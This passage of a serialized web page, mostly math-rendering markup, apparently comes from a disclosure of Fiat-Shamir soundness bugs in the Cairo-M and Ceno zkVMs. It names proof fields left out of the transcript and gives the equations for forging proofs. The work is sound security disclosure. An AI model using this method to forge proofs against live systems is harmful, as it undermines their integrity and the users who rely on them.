terms)",{"type":24,"tag":301,"props":125212,"children":125214},{"className":125213,"style":11012},[10914],[],{"type":24,"tag":301,"props":125216,"children":125218},{"className":125217},[11017],[125219],{"type":30,"value":523},{"type":24,"tag":301,"props":125221,"children":125223},{"className":125222,"style":11012},[10914],[],{"type":24,"tag":301,"props":125225,"children":125227},{"className":125226},[10824],[125228,125232],{"type":24,"tag":301,"props":125229,"children":125231},{"className":125230,"style":100775},[10829],[],{"type":24,"tag":301,"props":125233,"children":125235},{"className":125234},[10835],[125236],{"type":30,"value":584},{"type":24,"tag":32,"props":125238,"children":125239},{},[125240],{"type":30,"value":125241},"With challenges fixed, this is a rational equation in public data. This is not linear, but still algebraically solvable.",{"type":24,"tag":32,"props":125243,"children":125244},{},[125245],{"type":30,"value":125246},"Public-data coordinates participate in verification relations through extension-field arithmetic (including extension-valued public-memory entries), so the forged-parameter search is a coupled extension-field system.",{"type":24,"tag":32,"props":125248,"children":125249},{},[125250,125254,125256],{"type":24,"tag":60,"props":125251,"children":125252},{},[125253],{"type":30,"value":123449},{"type":30,"value":125255}," Fixed on October 31, 2025 via ",{"type":24,"tag":188,"props":125257,"children":125260},{"href":125258,"rel":125259},"https://github.com/kkrt-labs/cairo-m/pull/352/commits/92b6740937e904e0002e7ee099fec357127c1d16",[192],[125261],{"type":30,"value":125262},"commit 92b6740",{"type":24,"tag":2719,"props":125264,"children":125265},{},[],{"type":24,"tag":80,"props":125267,"children":125269},{"id":125268},"ceno-scroll",[125270],{"type":30,"value":125271},"Ceno (Scroll)",{"type":24,"tag":32,"props":125273,"children":125274},{},[125275],{"type":30,"value":125276},"Ceno is a zkVM by Scroll, using GKR with a tower sumcheck structure.",{"type":24,"tag":32,"props":125278,"children":125279},{},[125280,125282,125287],{"type":30,"value":125281},"Ceno splits verification into ",{"type":24,"tag":60,"props":125283,"children":125284},{},[125285],{"type":30,"value":125286},"chips",{"type":30,"value":125288},", with one per opcode or lookup table. Each chip proves its constraints independently.",{"type":24,"tag":32,"props":125290,"children":125291},{},[125292,125294,125299],{"type":30,"value":125293},"Many per-record values (reads, writes, lookups) are batched into a binary tree structure. Each layer folds pairs of values with random challenges; this is the ",{"type":24,"tag":60,"props":125295,"children":125296},{},[125297],{"type":30,"value":125298},"tower sumcheck",{"type":30,"value":206},{"type":24,"tag":32,"props":125301,"children":125302},{},[125303],{"type":30,"value":125304},"All read records must match all write records (plus initial/final state). This is checked via a multiset equality, this time using a product instead of logup:",{"type":24,"tag":32,"props":125306,"children":125307},{},[125308],{"type":24,"tag":145,"props":125309,"children":125311},{"className":125310},[10807,10808],[125312],{"type":24,"tag":301,"props":125313,"children":125315},{"className":125314},[10813],[125316],{"type":24,"tag":301,"props":125317,"children":125319},{"className":125318,"ariaHidden":10819},[10818],[125320,125493,125666],{"type":24,"tag":301,"props":125321,"children":125323},{"className":125322},[10824],[125324,125328,125386,125390,125399,125404,125413,125418,125480,125484,125489],{"type":24,"tag":301,"props":125325,"children":125327},{"className":125326,"style":99687},[10829],[],{"type":24,"tag":301,"props":125329,"children":125331},{"className":125330},[28393],[125332,125338],{"type":24,"tag":301,"props":125333,"children":125335},{"className":125334,"style":28400},[28393,28398,28399],[125336],{"type":30,"value":125337},"∏",{"type":24,"tag":301,"props":125339,"children":125341},{"className":125340},[10850],[125342],{"type":24,"tag":301,"props":125343,"children":125345},{"className":125344},[10855,28411],[125346,125375],{"type":24,"tag":301,"props":125347,"children":125349},{"className":125348},[10860],[125350,125370],{"type":24,"tag":301,"props":125351,"children":125353},{"className":125352,"style":120946},[10865],[125354],{"type":24,"tag":301,"props":125355,"children":125356},{"style":28424},[125357,125361],{"type":24,"tag":301,"props":125358,"children":125360},{"className":125359,"style":10875},[10874],[],{"type":24,"tag":301,"props":125362,"children":125364},{"className":125363},[10880,10881,10882,10883],[125365],{"type":24,"tag":301,"props":125366,"children":125368},{"className":125367},[10835,28357,10883],[125369],{"type":30,"value":10564},{"type":24,"tag":301,"props":125371,"children":125373},{"className":125372},[28514],[125374],{"type":30,"value":28517},{"type":24,"tag":301,"props":125376,"children":125378},{"className":125377},[10860],[125379],{"type":24,"tag":301,"props":125380,"children":125382},{"className":125381,"style":121226},[10865],[125383],{"type":24,"tag":301,"props":125384,"children":125385},{},[],{"type":24,"tag":301,"props":125387,"children":125389},{"className":125388,"style":10953},[10914],[],{"type":24,"tag":301,"props":125391,"children":125393},{"className":125392},[10835,30],[125394],{"type":24,"tag":301,"props":125395,"children":125397},{"className":125396},[10835],[125398],{"type":30,"value":100563},{"type":24,"tag":301,"props":125400,"children":125402},{"className":125401,"style":99745},[10835],[125403],{"type":30,"value":9918},{"type":24,"tag":301,"props":125405,"children":125407},{"className":125406},[10835,30],[125408],{"type":24,"tag":301,"props":125409,"children":125411},{"className":125410},[10835],[125412],{"type":30,"value":1004},{"type":24,"tag":301,"props":125414,"children":125416},{"className":125415,"style":99745},[10835],[125417],{"type":30,"value":9918},{"type":24,"tag":301,"props":125419,"children":125421},{"className":125420},[10835],[125422,125432],{"type":24,"tag":301,"props":125423,"children":125425},{"className":125424},[10835,30],[125426],{"type":24,"tag":301,"props":125427,"children":125429},{"className":125428},[10835],[125430],{"type":30,"value":125431},"evals",{"type":24,"tag":301,"props":125433,"children":125435},{"className":125434},[10850],[125436],{"type":24,"tag":301,"props":125437,"children":125439},{"className":125438},[10855,28411],[125440,125469],{"type":24,"tag":301,"props":125441,"children":125443},{"className":125442},[10860],[125444,125464],{"type":24,"tag":301,"props":125445,"children":125447},{"className":125446,"style":100273},[10865],[125448],{"type":24,"tag":301,"props":125449,"children":125450},{"style":120869},[125451,125455],{"type":24,"tag":301,"props":125452,"children":125454},{"className":125453,"style":10875},[10874],[],{"type":24,"tag":301,"props":125456,"children":125458},{"className":125457},[10880,10881,10882,10883],[125459],{"type":24,"tag":301,"props":125460,"children":125462},{"className":125461},[10835,28357,10883],[125463],{"type":30,"value":10564},{"type":24,"tag":301,"props":125465,"children":125467},{"className":125466},[28514],[125468],{"type":30,"value":28517},{"type":24,"tag":301,"props":125470,"children":125472},{"className":125471},[10860],[125473],{"type":24,"tag":301,"props":125474,"children":125476},{"className":125475,"style":99828},[10865],[125477],{"type":24,"tag":301,"props":125478,"children":125479},{},[],{"type":24,"tag":301,"props":125481,"children":125483},{"className":125482,"style":11012},[10914],[],{"type":24,"tag":301,"props":125485,"children":125487},{"className":125486},[11017],[125488],{"type":30,"value":523},{"type":24,"tag":301,"props":125490,"children":125492},{"className":125491,"style":11012},[10914],[],{"type":24,"tag":301,"props":125494,"children":125496},{"className":125495},[10824],[125497,125502,125559,125563,125572,125577,125586,125591,125653,125657,125662],{"type":24,"tag":301,"props":125498,"children":125501},{"className":125499,"style":125500},[10829],"height:1.1858em;vertical-align:-0.4358em;",[],{"type":24,"tag":301,"props":125503,"children":125505},{"className":125504},[28393],[125506,125511],{"type":24,"tag":301,"props":125507,"children":125509},{"className":125508,"style":28400},[28393,28398,28399],[125510],{"type":30,"value":125337},{"type":24,"tag":301,"props":125512,"children":125514},{"className":125513},[10850],[125515],{"type":24,"tag":301,"props":125516,"children":125518},{"className":125517},[10855,28411],[125519,125548],{"type":24,"tag":301,"props":125520,"children":125522},{"className":125521},[10860],[125523,125543],{"type":24,"tag":301,"props":125524,"children":125526},{"className":125525,"style":120946},[10865],[125527],{"type":24,"tag":301,"props":125528,"children":125529},{"style":28424},[125530,125534],{"type":24,"tag":301,"props":125531,"children":125533},{"className":125532,"style":10875},[10874],[],{"type":24,"tag":301,"props":125535,"children":125537},{"className":125536},[10880,10881,10882,10883],[125538],{"type":24,"tag":301,"props":125539,"children":125541},{"className":125540,"style":120962},[10835,28357,10883],[125542],{"type":30,"value":15470},{"type":24,"tag":301,"props":125544,"children":125546},{"className":125545},[28514],[125547],{"type":30,"value":28517},{"type":24,"tag":301,"props":125549,"children":125551},{"className":125550},[10860],[125552],{"type":24,"tag":301,"props":125553,"children":125555},{"className":125554,"style":120977},[10865],[125556],{"type":24,"tag":301,"props":125557,"children":125558},{},[],{"type":24,"tag":301,"props":125560,"children":125562},{"className":125561,"style":10953},[10914],[],{"type":24,"tag":301,"props":125564,"children":125566},{"className":125565},[10835,30],[125567],{"type":24,"tag":301,"props":125568,"children":125570},{"className":125569},[10835],[125571],{"type":30,"value":2580},{"type":24,"tag":301,"props":125573,"children":125575},{"className":125574,"style":99745},[10835],[125576],{"type":30,"value":9918},{"type":24,"tag":301,"props":125578,"children":125580},{"className":125579},[10835,30],[125581],{"type":24,"tag":301,"props":125582,"children":125584},{"className":125583},[10835],[125585],{"type":30,"value":1004},{"type":24,"tag":301,"props":125587,"children":125589},{"className":125588,"style":99745},[10835],[125590],{"type":30,"value":9918},{"type":24,"tag":301,"props":125592,"children":125594},{"className":125593},[10835],[125595,125604],{"type":24,"tag":301,"props":125596,"children":125598},{"className":125597},[10835,30],[125599],{"type":24,"tag":301,"props":125600,"children":125602},{"className":125601},[10835],[125603],{"type":30,"value":125431},{"type":24,"tag":301,"props":125605,"children":125607},{"className":125606},[10850],[125608],{"type":24,"tag":301,"props":125609,"children":125611},{"className":125610},[10855,28411],[125612,125641],{"type":24,"tag":301,"props":125613,"children":125615},{"className":125614},[10860],[125616,125636],{"type":24,"tag":301,"props":125617,"children":125619},{"className":125618,"style":100273},[10865],[125620],{"type":24,"tag":301,"props":125621,"children":125622},{"style":120869},[125623,125627],{"type":24,"tag":301,"props":125624,"children":125626},{"className":125625,"style":10875},[10874],[],{"type":24,"tag":301,"props":125628,"children":125630},{"className":125629},[10880,10881,10882,10883],[125631],{"type":24,"tag":301,"props":125632,"children":125634},{"className":125633,"style":120962},[10835,28357,10883],[125635],{"type":30,"value":15470},{"type":24,"tag":301,"props":125637,"children":125639},{"className":125638},[28514],[125640],{"type":30,"value":28517},{"type":24,"tag":301,"props":125642,"children":125644},{"className":125643},[10860],[125645],{"type":24,"tag":301,"props":125646,"children":125649},{"className":125647,"style":125648},[10865],"height:0.2861em;",[125650],{"type":24,"tag":301,"props":125651,"children":125652},{},[],{"type":24,"tag":301,"props":125654,"children":125656},{"className":125655,"style":10915},[10914],[],{"type":24,"tag":301,"props":125658,"children":125660},{"className":125659},[10920],[125661],{"type":30,"value":118002},{"type":24,"tag":301,"props":125663,"children":125665},{"className":125664,"style":10915},[10914],[],{"type":24,"tag":301,"props":125667,"children":125669},{"className":125668},[10824],[125670,125674,125679,125689],{"type":24,"tag":301,"props":125671,"children":125673},{"className":125672,"style":10935},[10829],[],{"type":24,"tag":301,"props":125675,"children":125677},{"className":125676},[28486],[125678],{"type":30,"value":362},{"type":24,"tag":301,"props":125680,"children":125682},{"className":125681},[10835,30],[125683],{"type":24,"tag":301,"props":125684,"children":125686},{"className":125685},[10835],[125687],{"type":30,"value":125688},"state factors",{"type":24,"tag":301,"props":125690,"children":125692},{"className":125691},[28508],[125693],{"type":30,"value":9961},{"type":24,"tag":32,"props":125695,"children":125696},{},[125697],{"type":24,"tag":60,"props":125698,"children":125699},{},[125700],{"type":30,"value":122155},{"type":24,"tag":291,"props":125702,"children":125704},{"code":125703},"ZKVMChipProof {\n r_out_evals: [[FieldElement]], // \u003C- VULNERABLE\n w_out_evals: [[FieldElement]], // \u003C- VULNERABLE\n lk_out_evals: [[FieldElement]], // \u003C- VULNERABLE\n tower_proof: [...],\n gkr_iop_proof: [...],\n}\n",[125705],{"type":24,"tag":145,"props":125706,"children":125707},{"__ignoreMap":7},[125708],{"type":30,"value":125703},{"type":24,"tag":32,"props":125710,"children":125711},{},[125712,125718,125719,125725,125726,125732],{"type":24,"tag":145,"props":125713,"children":125715},{"className":125714},[],[125716],{"type":30,"value":125717},"r_out_evals",{"type":30,"value":377},{"type":24,"tag":145,"props":125720,"children":125722},{"className":125721},[],[125723],{"type":30,"value":125724},"w_out_evals",{"type":30,"value":8410},{"type":24,"tag":145,"props":125727,"children":125729},{"className":125728},[],[125730],{"type":30,"value":125731},"lk_out_evals",{"type":30,"value":125733}," are used to initialize the tower sumcheck claim, but they're never absorbed into the transcript. This leaves us with two equations:",{"type":24,"tag":6246,"props":125735,"children":125736},{},[125737],{"type":24,"tag":2659,"props":125738,"children":125739},{},[125740,125745,125747,125753],{"type":24,"tag":60,"props":125741,"children":125742},{},[125743],{"type":30,"value":125744},"GKR/Tower equation",{"type":30,"value":125746}," (linear in ",{"type":24,"tag":145,"props":125748,"children":125750},{"className":125749},[],[125751],{"type":30,"value":125752},"out_evals",{"type":30,"value":7665},{"type":24,"tag":32,"props":125755,"children":125756},{},[125757,125759],{"type":30,"value":125758},"The tower sumcheck claim is ",{"type":24,"tag":145,"props":125760,"children":125762},{"className":125761},[10807,10808],[125763],{"type":24,"tag":301,"props":125764,"children":125766},{"className":125765},[10813],[125767],{"type":24,"tag":301,"props":125768,"children":125770},{"className":125769,"ariaHidden":10819},[10818],[125771,125802,125927],{"type":24,"tag":301,"props":125772,"children":125774},{"className":125773},[10824],[125775,125779,125789,125793,125798],{"type":24,"tag":301,"props":125776,"children":125778},{"className":125777,"style":99660},[10829],[],{"type":24,"tag":301,"props":125780,"children":125782},{"className":125781},[10835,30],[125783],{"type":24,"tag":301,"props":125784,"children":125786},{"className":125785},[10835],[125787],{"type":30,"value":125788},"claim",{"type":24,"tag":301,"props":125790,"children":125792},{"className":125791,"style":11012},[10914],[],{"type":24,"tag":301,"props":125794,"children":125796},{"className":125795},[11017],[125797],{"type":30,"value":523},{"type":24,"tag":301,"props":125799,"children":125801},{"className":125800,"style":11012},[10914],[],{"type":24,"tag":301,"props":125803,"children":125805},{"className":125804},[10824],[125806,125811,125868,125872,125914,125918,125923],{"type":24,"tag":301,"props":125807,"children":125810},{"className":125808,"style":125809},[10829],"height:1.2605em;vertical-align:-0.4358em;",[],{"type":24,"tag":301,"props":125812,"children":125814},{"className":125813},[28393],[125815,125820],{"type":24,"tag":301,"props":125816,"children":125818},{"className":125817,"style":28400},[28393,28398,28399],[125819],{"type":30,"value":115536},{"type":24,"tag":301,"props":125821,"children":125823},{"className":125822},[10850],[125824],{"type":24,"tag":301,"props":125825,"children":125827},{"className":125826},[10855,28411],[125828,125857],{"type":24,"tag":301,"props":125829,"children":125831},{"className":125830},[10860],[125832,125852],{"type":24,"tag":301,"props":125833,"children":125835},{"className":125834,"style":120946},[10865],[125836],{"type":24,"tag":301,"props":125837,"children":125838},{"style":28424},[125839,125843],{"type":24,"tag":301,"props":125840,"children":125842},{"className":125841,"style":10875},[10874],[],{"type":24,"tag":301,"props":125844,"children":125846},{"className":125845},[10880,10881,10882,10883],[125847],{"type":24,"tag":301,"props":125848,"children":125850},{"className":125849,"style":120962},[10835,28357,10883],[125851],{"type":30,"value":15470},{"type":24,"tag":301,"props":125853,"children":125855},{"className":125854},[28514],[125856],{"type":30,"value":28517},{"type":24,"tag":301,"props":125858,"children":125860},{"className":125859},[10860],[125861],{"type":24,"tag":301,"props":125862,"children":125864},{"className":125863,"style":120977},[10865],[125865],{"type":24,"tag":301,"props":125866,"children":125867},{},[],{"type":24,"tag":301,"props":125869,"children":125871},{"className":125870,"style":10953},[10914],[],{"type":24,"tag":301,"props":125873,"children":125875},{"className":125874},[10835],[125876,125881],{"type":24,"tag":301,"props":125877,"children":125879},{"className":125878,"style":121827},[10835,28357],[125880],{"type":30,"value":121830},{"type":24,"tag":301,"props":125882,"children":125884},{"className":125883},[10850],[125885],{"type":24,"tag":301,"props":125886,"children":125888},{"className":125887},[10855],[125889],{"type":24,"tag":301,"props":125890,"children":125892},{"className":125891},[10860],[125893],{"type":24,"tag":301,"props":125894,"children":125897},{"className":125895,"style":125896},[10865],"height:0.8247em;",[125898],{"type":24,"tag":301,"props":125899,"children":125900},{"style":10869},[125901,125905],{"type":24,"tag":301,"props":125902,"children":125904},{"className":125903,"style":10875},[10874],[],{"type":24,"tag":301,"props":125906,"children":125908},{"className":125907},[10880,10881,10882,10883],[125909],{"type":24,"tag":301,"props":125910,"children":125912},{"className":125911,"style":120962},[10835,28357,10883],[125913],{"type":30,"value":15470},{"type":24,"tag":301,"props":125915,"children":125917},{"className":125916,"style":10915},[10914],[],{"type":24,"tag":301,"props":125919,"children":125921},{"className":125920},[10920],[125922],{"type":30,"value":118002},{"type":24,"tag":301,"props":125924,"children":125926},{"className":125925,"style":10915},[10914],[],{"type":24,"tag":301,"props":125928,"children":125930},{"className":125929},[10824],[125931,125935,125944,125949],{"type":24,"tag":301,"props":125932,"children":125934},{"className":125933,"style":101157},[10829],[],{"type":24,"tag":301,"props":125936,"children":125938},{"className":125937},[10835,30],[125939],{"type":24,"tag":301,"props":125940,"children":125942},{"className":125941},[10835],[125943],{"type":30,"value":1004},{"type":24,"tag":301,"props":125945,"children":125947},{"className":125946,"style":99745},[10835],[125948],{"type":30,"value":9918},{"type":24,"tag":301,"props":125950,"children":125952},{"className":125951},[10835],[125953,125962],{"type":24,"tag":301,"props":125954,"children":125956},{"className":125955},[10835,30],[125957],{"type":24,"tag":301,"props":125958,"children":125960},{"className":125959},[10835],[125961],{"type":30,"value":125431},{"type":24,"tag":301,"props":125963,"children":125965},{"className":125964},[10850],[125966],{"type":24,"tag":301,"props":125967,"children":125969},{"className":125968},[10855,28411],[125970,125999],{"type":24,"tag":301,"props":125971,"children":125973},{"className":125972},[10860],[125974,125994],{"type":24,"tag":301,"props":125975,"children":125977},{"className":125976,"style":100273},[10865],[125978],{"type":24,"tag":301,"props":125979,"children":125980},{"style":120869},[125981,125985],{"type":24,"tag":301,"props":125982,"children":125984},{"className":125983,"style":10875},[10874],[],{"type":24,"tag":301,"props":125986,"children":125988},{"className":125987},[10880,10881,10882,10883],[125989],{"type":24,"tag":301,"props":125990,"children":125992},{"className":125991,"style":120962},[10835,28357,10883],[125993],{"type":30,"value":15470},{"type":24,"tag":301,"props":125995,"children":125997},{"className":125996},[28514],[125998],{"type":30,"value":28517},{"type":24,"tag":301,"props":126000,"children":126002},{"className":126001},[10860],[126003],{"type":24,"tag":301,"props":126004,"children":126006},{"className":126005,"style":125648},[10865],[126007],{"type":24,"tag":301,"props":126008,"children":126009},{},[],{"type":24,"tag":32,"props":126011,"children":126012},{},[126013,126015,126020],{"type":30,"value":126014},"This check is linear in ",{"type":24,"tag":145,"props":126016,"children":126018},{"className":126017},[],[126019],{"type":30,"value":125752},{"type":30,"value":206},{"type":24,"tag":6246,"props":126022,"children":126023},{"start":320},[126024],{"type":24,"tag":2659,"props":126025,"children":126026},{},[126027,126032,126034,126039],{"type":24,"tag":60,"props":126028,"children":126029},{},[126030],{"type":30,"value":126031},"rw-product consistency",{"type":30,"value":126033}," (bilinear in ",{"type":24,"tag":145,"props":126035,"children":126037},{"className":126036},[],[126038],{"type":30,"value":125752},{"type":30,"value":7665},{"type":24,"tag":32,"props":126041,"children":126042},{},[126043],{"type":24,"tag":145,"props":126044,"children":126046},{"className":126045},[10807,10808],[126047],{"type":24,"tag":301,"props":126048,"children":126050},{"className":126049},[10813],[126051],{"type":24,"tag":301,"props":126052,"children":126054},{"className":126053,"ariaHidden":10819},[10818],[126055,126226,126397],{"type":24,"tag":301,"props":126056,"children":126058},{"className":126057},[10824],[126059,126063,126120,126124,126133,126138,126147,126152,126213,126217,126222],{"type":24,"tag":301,"props":126060,"children":126062},{"className":126061,"style":99687},[10829],[],{"type":24,"tag":301,"props":126064,"children":126066},{"className":126065},[28393],[126067,126072],{"type":24,"tag":301,"props":126068,"children":126070},{"className":126069,"style":28400},[28393,28398,28399],[126071],{"type":30,"value":125337},{"type":24,"tag":301,"props":126073,"children":126075},{"className":126074},[10850],[126076],{"type":24,"tag":301,"props":126077,"children":126079},{"className":126078},[10855,28411],[126080,126109],{"type":24,"tag":301,"props":126081,"children":126083},{"className":126082},[10860],[126084,126104],{"type":24,"tag":301,"props":126085,"children":126087},{"className":126086,"style":120946},[10865],[126088],{"type":24,"tag":301,"props":126089,"children":126090},{"style":28424},[126091,126095],{"type":24,"tag":301,"props":126092,"children":126094},{"className":126093,"style":10875},[10874],[],{"type":24,"tag":301,"props":126096,"children":126098},{"className":126097},[10880,10881,10882,10883],[126099],{"type":24,"tag":301,"props":126100,"children":126102},{"className":126101},[10835,28357,10883],[126103],{"type":30,"value":10564},{"type":24,"tag":301,"props":126105,"children":126107},{"className":126106},[28514],[126108],{"type":30,"value":28517},{"type":24,"tag":301,"props":126110,"children":126112},{"className":126111},[10860],[126113],{"type":24,"tag":301,"props":126114,"children":126116},{"className":126115,"style":121226},[10865],[126117],{"type":24,"tag":301,"props":126118,"children":126119},{},[],{"type":24,"tag":301,"props":126121,"children":126123},{"className":126122,"style":10953},[10914],[],{"type":24,"tag":301,"props":126125,"children":126127},{"className":126126},[10835,30],[126128],{"type":24,"tag":301,"props":126129,"children":126131},{"className":126130},[10835],[126132],{"type":30,"value":100563},{"type":24,"tag":301,"props":126134,"children":126136},{"className":126135,"style":99745},[10835],[126137],{"type":30,"value":9918},{"type":24,"tag":301,"props":126139,"children":126141},{"className":126140},[10835,30],[126142],{"type":24,"tag":301,"props":126143,"children":126145},{"className":126144},[10835],[126146],{"type":30,"value":1004},{"type":24,"tag":301,"props":126148,"children":126150},{"className":126149,"style":99745},[10835],[126151],{"type":30,"value":9918},{"type":24,"tag":301,"props":126153,"children":126155},{"className":126154},[10835],[126156,126165],{"type":24,"tag":301,"props":126157,"children":126159},{"className":126158},[10835,30],[126160],{"type":24,"tag":301,"props":126161,"children":126163},{"className":126162},[10835],[126164],{"type":30,"value":125431},{"type":24,"tag":301,"props":126166,"children":126168},{"className":126167},[10850],[126169],{"type":24,"tag":301,"props":126170,"children":126172},{"className":126171},[10855,28411],[126173,126202],{"type":24,"tag":301,"props":126174,"children":126176},{"className":126175},[10860],[126177,126197],{"type":24,"tag":301,"props":126178,"children":126180},{"className":126179,"style":100273},[10865],[126181],{"type":24,"tag":301,"props":126182,"children":126183},{"style":120869},[126184,126188],{"type":24,"tag":301,"props":126185,"children":126187},{"className":126186,"style":10875},[10874],[],{"type":24,"tag":301,"props":126189,"children":126191},{"className":126190},[10880,10881,10882,10883],[126192],{"type":24,"tag":301,"props":126193,"children":126195},{"className":126194},[10835,28357,10883],[126196],{"type":30,"value":10564},{"type":24,"tag":301,"props":126198,"children":126200},{"className":126199},[28514],[126201],{"type":30,"value":28517},{"type":24,"tag":301,"props":126203,"children":126205},{"className":126204},[10860],[126206],{"type":24,"tag":301,"props":126207,"children":126209},{"className":126208,"style":99828},[10865],[126210],{"type":24,"tag":301,"props":126211,"children":126212},{},[],{"type":24,"tag":301,"props":126214,"children":126216},{"className":126215,"style":11012},[10914],[],{"type":24,"tag":301,"props":126218,"children":126220},{"className":126219},[11017],[126221],{"type":30,"value":523},{"type":24,"tag":301,"props":126223,"children":126225},{"className":126224,"style":11012},[10914],[],{"type":24,"tag":301,"props":126227,"children":126229},{"className":126228},[10824],[126230,126234,126291,126295,126304,126309,126318,126323,126384,126388,126393],{"type":24,"tag":301,"props":126231,"children":126233},{"className":126232,"style":125500},[10829],[],{"type":24,"tag":301,"props":126235,"children":126237},{"className":126236},[28393],[126238,126243],{"type":24,"tag":301,"props":126239,"children":126241},{"className":126240,"style":28400},[28393,28398,28399],[126242],{"type":30,"value":125337},{"type":24,"tag":301,"props":126244,"children":126246},{"className":126245},[10850],[126247],{"type":24,"tag":301,"props":126248,"children":126250},{"className":126249},[10855,28411],[126251,126280],{"type":24,"tag":301,"props":126252,"children":126254},{"className":126253},[10860],[126255,126275],{"type":24,"tag":301,"props":126256,"children":126258},{"className":126257,"style":120946},[10865],[126259],{"type":24,"tag":301,"props":126260,"children":126261},{"style":28424},[126262,126266],{"type":24,"tag":301,"props":126263,"children":126265},{"className":126264,"style":10875},[10874],[],{"type":24,"tag":301,"props":126267,"children":126269},{"className":126268},[10880,10881,10882,10883],[126270],{"type":24,"tag":301,"props":126271,"children":126273},{"className":126272,"style":120962},[10835,28357,10883],[126274],{"type":30,"value":15470},{"type":24,"tag":301,"props":126276,"children":126278},{"className":126277},[28514],[126279],{"type":30,"value":28517},{"type":24,"tag":301,"props":126281,"children":126283},{"className":126282},[10860],[126284],{"type":24,"tag":301,"props":126285,"children":126287},{"className":126286,"style":120977},[10865],[126288],{"type":24,"tag":301,"props":126289,"children":126290},{},[],{"type":24,"tag":301,"props":126292,"children":126294},{"className":126293,"style":10953},[10914],[],{"type":24,"tag":301,"props":126296,"children":126298},{"className":126297},[10835,30],[126299],{"type":24,"tag":301,"props":126300,"children":126302},{"className":126301},[10835],[126303],{"type":30,"value":2580},{"type":24,"tag":301,"props":126305,"children":126307},{"className":126306,"style":99745},[10835],[126308],{"type":30,"value":9918},{"type":24,"tag":301,"props":126310,"children":126312},{"className":126311},[10835,30],[126313],{"type":24,"tag":301,"props":126314,"children":126316},{"className":126315},[10835],[126317],{"type":30,"value":1004},{"type":24,"tag":301,"props":126319,"children":126321},{"className":126320,"style":99745},[10835],[126322],{"type":30,"value":9918},{"type":24,"tag":301,"props":126324,"children":126326},{"className":126325},[10835],[126327,126336],{"type":24,"tag":301,"props":126328,"children":126330},{"className":126329},[10835,30],[126331],{"type":24,"tag":301,"props":126332,"children":126334},{"className":126333},[10835],[126335],{"type":30,"value":125431},{"type":24,"tag":301,"props":126337,"children":126339},{"className":126338},[10850],[126340],{"type":24,"tag":301,"props":126341,"children":126343},{"className":126342},[10855,28411],[126344,126373],{"type":24,"tag":301,"props":126345,"children":126347},{"className":126346},[10860],[126348,126368],{"type":24,"tag":301,"props":126349,"children":126351},{"className":126350,"style":100273},[10865],[126352],{"type":24,"tag":301,"props":126353,"children":126354},{"style":120869},[126355,126359],{"type":24,"tag":301,"props":126356,"children":126358},{"className":126357,"style":10875},[10874],[],{"type":24,"tag":301,"props":126360,"children":126362},{"className":126361},[10880,10881,10882,10883],[126363],{"type":24,"tag":301,"props":126364,"children":126366},{"className":126365,"style":120962},[10835,28357,10883],[126367],{"type":30,"value":15470},{"type":24,"tag":301,"props":126369,"children":126371},{"className":126370},[28514],[126372],{"type":30,"value":28517},{"type":24,"tag":301,"props":126374,"children":126376},{"className":126375},[10860],[126377],{"type":24,"tag":301,"props":126378,"children":126380},{"className":126379,"style":125648},[10865],[126381],{"type":24,"tag":301,"props":126382,"children":126383},{},[],{"type":24,"tag":301,"props":126385,"children":126387},{"className":126386,"style":10915},[10914],[],{"type":24,"tag":301,"props":126389,"children":126391},{"className":126390},[10920],[126392],{"type":30,"value":118002},{"type":24,"tag":301,"props":126394,"children":126396},{"className":126395,"style":10915},[10914],[],{"type":24,"tag":301,"props":126398,"children":126400},{"className":126399},[10824],[126401,126405,126410,126419],{"type":24,"tag":301,"props":126402,"children":126404},{"className":126403,"style":10935},[10829],[],{"type":24,"tag":301,"props":126406,"children":126408},{"className":126407},[28486],[126409],{"type":30,"value":362},{"type":24,"tag":301,"props":126411,"children":126413},{"className":126412},[10835,30],[126414],{"type":24,"tag":301,"props":126415,"children":126417},{"className":126416},[10835],[126418],{"type":30,"value":125688},{"type":24,"tag":301,"props":126420,"children":126422},{"className":126421},[28508],[126423],{"type":30,"value":9961},{"type":24,"tag":32,"props":126425,"children":126426},{},[126427,126429,126598,126599,126768],{"type":30,"value":126428},"If we vary ",{"type":24,"tag":145,"props":126430,"children":126432},{"className":126431},[10807,10808],[126433],{"type":24,"tag":301,"props":126434,"children":126436},{"className":126435},[10813],[126437],{"type":24,"tag":301,"props":126438,"children":126440},{"className":126439,"ariaHidden":10819},[10818],[126441,126519],{"type":24,"tag":301,"props":126442,"children":126444},{"className":126443},[10824],[126445,126449,126506,126510,126515],{"type":24,"tag":301,"props":126446,"children":126448},{"className":126447,"style":116710},[10829],[],{"type":24,"tag":301,"props":126450,"children":126452},{"className":126451},[10835],[126453,126458],{"type":24,"tag":301,"props":126454,"children":126456},{"className":126455},[10835,28357],[126457],{"type":30,"value":26050},{"type":24,"tag":301,"props":126459,"children":126461},{"className":126460},[10850],[126462],{"type":24,"tag":301,"props":126463,"children":126465},{"className":126464},[10855,28411],[126466,126495],{"type":24,"tag":301,"props":126467,"children":126469},{"className":126468},[10860],[126470,126490],{"type":24,"tag":301,"props":126471,"children":126473},{"className":126472,"style":99797},[10865],[126474],{"type":24,"tag":301,"props":126475,"children":126476},{"style":99801},[126477,126481],{"type":24,"tag":301,"props":126478,"children":126480},{"className":126479,"style":10875},[10874],[],{"type":24,"tag":301,"props":126482,"children":126484},{"className":126483},[10880,10881,10882,10883],[126485],{"type":24,"tag":301,"props":126486,"children":126488},{"className":126487},[10835,10883],[126489],{"type":30,"value":584},{"type":24,"tag":301,"props":126491,"children":126493},{"className":126492},[28514],[126494],{"type":30,"value":28517},{"type":24,"tag":301,"props":126496,"children":126498},{"className":126497},[10860],[126499],{"type":24,"tag":301,"props":126500,"children":126502},{"className":126501,"style":99828},[10865],[126503],{"type":24,"tag":301,"props":126504,"children":126505},{},[],{"type":24,"tag":301,"props":126507,"children":126509},{"className":126508,"style":11012},[10914],[],{"type":24,"tag":301,"props":126511,"children":126513},{"className":126512},[11017],[126514],{"type":30,"value":523},{"type":24,"tag":301,"props":126516,"children":126518},{"className":126517,"style":11012},[10914],[],{"type":24,"tag":301,"props":126520,"children":126522},{"className":126521},[10824],[126523,126527,126568,126573,126578,126583,126588,126593],{"type":24,"tag":301,"props":126524,"children":126526},{"className":126525,"style":99687},[10829],[],{"type":24,"tag":301,"props":126528,"children":126530},{"className":126529},[10835],[126531,126540,126545,126554,126559],{"type":24,"tag":301,"props":126532,"children":126534},{"className":126533},[10835,30],[126535],{"type":24,"tag":301,"props":126536,"children":126538},{"className":126537},[10835],[126539],{"type":30,"value":100563},{"type":24,"tag":301,"props":126541,"children":126543},{"className":126542,"style":99745},[10835],[126544],{"type":30,"value":9918},{"type":24,"tag":301,"props":126546,"